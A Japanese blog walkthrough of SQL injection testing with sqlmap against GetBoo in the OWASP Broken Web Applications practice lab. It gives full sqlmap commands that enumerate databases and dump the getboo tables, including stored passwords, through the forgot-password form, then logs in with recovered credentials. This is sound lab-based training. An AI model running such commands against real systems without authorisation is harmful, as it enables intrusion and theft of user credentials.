Shikata Ga Nai

Private? There is no such things.

GetBooでsqlmapをためしてみた

Hello there, ('ω')ノ

 

OWASP BWAにあるBetBooをチョイスして。

 

f:id:ThisIsOne:20220205133552p:plain

 

下記でログインしてみると。

 admin/admin

 

f:id:ThisIsOne:20220205133534p:plain

 

あっさりとログインできたのでなかったことにして。

 

f:id:ThisIsOne:20220205133635p:plain

 

ログアウトして、適当にログインして。

 abc/abc

 

f:id:ThisIsOne:20220205133758p:plain

 

リクエストを確認すると、下記のパラメータが確認できて。

token=0e40b415ec81f9613974bb1bdac4a67b&name=abc&pass=abc&submitted=Log+In

 

f:id:ThisIsOne:20220205133940p:plain

 

sqlmapで、脆弱性を確認することに。

 sqlmap -u "http://192.168.0.14/getboo/login.php" --data "token=0e40b415ec81f9613974bb1bdac4a67b&name=abc&pass=abc&submitted=Log+In"

 

f:id:ThisIsOne:20220205134923p:plain

 

途中、基本的には大文字のデフォルトを選択して。

 

POSTパラメータ「token」はアンチCSRFトークンを保持しているようです

sqlmapがそれ以降のリクエストで自動的に更新するようにしますか? [y / N] N


ターゲットURLへの接続をテストしています
サーバが独自のCookieを設定しようとしているときにCookieを宣言していません

( 'PHPSESSID = 9cvhjcq2s6q ... 6f29fpdsh2')

それらを使いますか[Y / n] Y

 

他の(潜在的な)手法が少なくとも1つ見つからない場合は、

基本的なUNIONテストのみを実行することをお勧めします

リクエストの数を減らしたいですか? [Y / n] Y

 

f:id:ThisIsOne:20220205135043p:plain

 

結果より、どうやらインジェクションできそうもないようで。

 

f:id:ThisIsOne:20220205134830p:plain

 

確認のため、ダンプしてみても脆弱性がないので同じ結果で。

 sqlmap -u "http://192.168.0.14/getboo/login.php" --data "token=0e40b415ec81f9613974bb1bdac4a67b&name=abc&pass=abc&submitted=Log+In" --dump-all

 

f:id:ThisIsOne:20220205140806p:plain

 

次にパスワードを忘れたページに移って。

 

f:id:ThisIsOne:20220205135654p:plain

 

同じようにパラメータを確認して。

 aname=abc&email=abc%40mail.com&submitted=Hint+question

f:id:ThisIsOne:20220205135735p:plain

 

sqlmapでいきなりダンプしてみることに。

 sqlmap -u "http://192.168.0.14/getboo/forgotpass.php" --data "aname=abc&email=abc%40mail.com&submitted=Hint+question" --dump-all

 

f:id:ThisIsOne:20220205141209p:plain

 

OWASP BWA全体のデータベースのダンプをし始めたので一旦、終了して。

 

f:id:ThisIsOne:20220205141102p:plain

 

まずは、データベースの探索から。

 sqlmap -u "http://192.168.0.14/getboo/forgotpass.php" --data "aname=abc&email=abc%40mail.com&submitted=Hint+question" --dbs

 

f:id:ThisIsOne:20220205141409p:plain

 

getbooというデータベースがみつかったので。

 

f:id:ThisIsOne:20220205141452p:plain

 

データベースを指定して、再度ダンプすることに。

 sqlmap -u "http://192.168.0.14/getboo/forgotpass.php" --data "aname=abc&email=abc%40mail.com&submitted=Hint+question" -D getboo --dump-all

f:id:ThisIsOne:20220205142033p:plain


パスワードを保存しているテーブルをダンプできたので。

 

f:id:ThisIsOne:20220205141924p:plain

 

下記でログインしてみると。

 demo/demo

 

f:id:ThisIsOne:20220205142112p:plain

 

ログインできて。

 

f:id:ThisIsOne:20220205142140p:plain

 

Best regards, (^^ゞ